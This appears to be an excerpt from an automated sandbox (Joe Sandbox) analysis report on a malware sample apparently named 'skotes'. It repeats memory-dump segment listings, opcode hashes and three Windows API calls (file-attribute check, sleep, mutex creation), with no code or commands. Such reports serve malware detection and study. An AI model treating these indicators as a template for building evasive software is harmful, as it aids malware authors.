                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                • Opcode ID: 64e490fac601f2d67d9388b6ca7e72a119bed77b2d1cf96f27d8596a2eb7a590
                                                                                                                                                                • Instruction ID: 1830c4390ce7418946fd168396a741fc84c08c48d8054f6771b5dd7b4d3350a0
                                                                                                                                                                • Opcode Fuzzy Hash: 64e490fac601f2d67d9388b6ca7e72a119bed77b2d1cf96f27d8596a2eb7a590
                                                                                                                                                                • Instruction Fuzzy Hash: 42312A316042449BFB08FBB8DCC9B6DB7E2DBC6314F2442AAE015A73E5D775A980C752
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B8A1B1
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                • Opcode ID: 7821c4dbbd0ab57a8eec7ff66c366d432b9ca2a5baf7e968870acde554005d22
                                                                                                                                                                • Instruction ID: 4345fe92a25f842281dbdfd2749630f1f86f1c3ea33f70b98501786bf1f8c454
                                                                                                                                                                • Opcode Fuzzy Hash: 7821c4dbbd0ab57a8eec7ff66c366d432b9ca2a5baf7e968870acde554005d22
                                                                                                                                                                • Instruction Fuzzy Hash: CD312A316042449BFB18FF78DCC9B6DB7E2EBC6310F2442AAE014A72E5D7759980C712
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B8A2E6
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                • Opcode ID: a6499b2ef57e09c69274ca53f789d7ed827d216462016497fed462393ed39028
                                                                                                                                                                • Instruction ID: 2f88f5c3e0311fee2f126c1954fd06605a252fdbe7f940c3c96c7fd0948f75b0
                                                                                                                                                                • Opcode Fuzzy Hash: a6499b2ef57e09c69274ca53f789d7ed827d216462016497fed462393ed39028
                                                                                                                                                                • Instruction Fuzzy Hash: 7F314A316042449BFB18EF78DCC9B6CB7F2EBC6314F2082AAE015972E5C775A980C712
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B8A41B
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                • Opcode ID: 842746b9bf7107d186505b3ff09f8a3e6e2c91a8188a6ddfbdc5098c533ac601
                                                                                                                                                                • Instruction ID: 1eaaef9d172902627006bc877d974dda9458fcf1f08a542dfd8343420785137c
                                                                                                                                                                • Opcode Fuzzy Hash: 842746b9bf7107d186505b3ff09f8a3e6e2c91a8188a6ddfbdc5098c533ac601
                                                                                                                                                                • Instruction Fuzzy Hash: B1312B316041449BFF08FB78D8C9B6DBBE2DBC5314F24429AE015973E5DBB59980C752
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B8A550
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
